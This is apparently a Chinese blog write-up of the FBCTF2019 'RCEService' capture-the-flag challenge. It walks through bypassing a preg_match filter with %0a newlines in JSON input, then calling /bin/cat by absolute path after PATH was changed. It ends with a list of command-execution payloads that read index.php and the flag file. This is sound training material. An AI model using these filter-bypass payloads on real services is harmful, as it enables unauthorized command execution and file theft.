练[FBCTF2019]RCEService

[FBCTF2019]RCEService

文章目录

掌握知识

json字符串格式,命令失效(修改环境变量)--绝对路径使用linux命令,%0a绕过preg_match函数,代码审计

解题思路

  1. 打开题目链接,发现可以通过json格式传递命令进行命令执行,但是不知道json的键名,输入ls显示无法识别,查看源代码后发现该输入框的name信息为cmd,确定这就是键,构建paylaod{"cmd":"ls"},抓包查看成功回显信息
  1. 发现命令正常执行,准备查看根目录的文件,由于是get传参,所以空格先编码为%20,但是发现回显hacking,经过测试发现是对/进行了过滤
  1. 既然不能使用/,那就直接使用cat命令查看一下index.php文件,发现还是不行,尝试更改cat的格式进行绕过,发现还是不行。
  1. 仔细想想,既然存在过滤,多半碰到的函数都是preg_match,该函数可以通过换行符%0a和数组进行绕过,因为该函数只会匹配第一行数据,除非设置了参数。所以默认为preg_match函数过滤,构建paylaod{%0a"cmd":"cat%20index.php"%0a}。发现还是不行,但是可以执行ls /命令了,证明前面猜测没问题,还绕过来了过滤
  1. 那为什么cat命令还不行执行呢,都已经绕过了过滤。其实在没有限制的情况下命令还不能执行,只能是该命令被屏蔽了,但是使用其他查看文件的命令也都不可以。
  2. 那可能就是环境变量被更改了,需要使用命令的绝对路径来执行,也就是/bin/cat。再次构建paylaod{%0a"cmd":"/bin/cat%20index.php"%0a}。成功回显了文件内容,还得到了一个病毒提示...
  1. 发现过滤函数确实是preg_match,代码的一开始就将环境变量修改了,既然flag不在根目录下,那很可能就在这个环境变量中,查看环境变量目录结构,发现了flag目录,cat命令直接拿下flag

关键paylaod

php 复制代码
{"cmd":"ls"}

{"cmd":"ls%20/"}

{"cmd":"cat%20index.php"}

{%0a"cmd":"ls%20/"%0a}

{%0a"cmd":"cat%20index.php"%0a}

{%0a"cmd":"/bin/cat%20index.php"%0a}

{%0a"cmd":"ls%20/home/rceserive"%0a}

{%0a"cmd":"/bin/cat%20/home/rceserive/flag"%0a}
相关推荐
Vincent_Zhang2334 分钟前
第四、五章补充:线代本质合集(B站:小崔说数)
笔记
19999er5 分钟前
LAMP搭建
网络·笔记·安全·网络安全·云计算
亭台26 分钟前
【Word_笔记】Word的修订模式内容改为颜色标记
笔记·word
黑客老陈31 分钟前
SRC技巧篇 | 利用工具批量挖掘SRC
网络·python·sql·安全·web安全
乐茵安全36 分钟前
《Windows基础与网络安全:用户账户管理与安全策略》
windows·安全·web安全
007php0071 小时前
GoZero项目中解决`go.mod`和`go.sum`校验和不匹配问题的解决方案
java·服务器·开发语言·后端·python·golang·php
开水好喝1 小时前
Github Copilot学习笔记
笔记·学习
龙哥·三年风水2 小时前
接口项目架构流程图-thinkphp6-rabbitmq
rabbitmq·php·流程图
1101 11013 小时前
STM32-笔记38-I2C-oled实验
笔记·stm32·嵌入式硬件
星迹日5 小时前
数据结构:包装类和泛型
java·开发语言·数据结构·笔记·泛型·通配符·包装类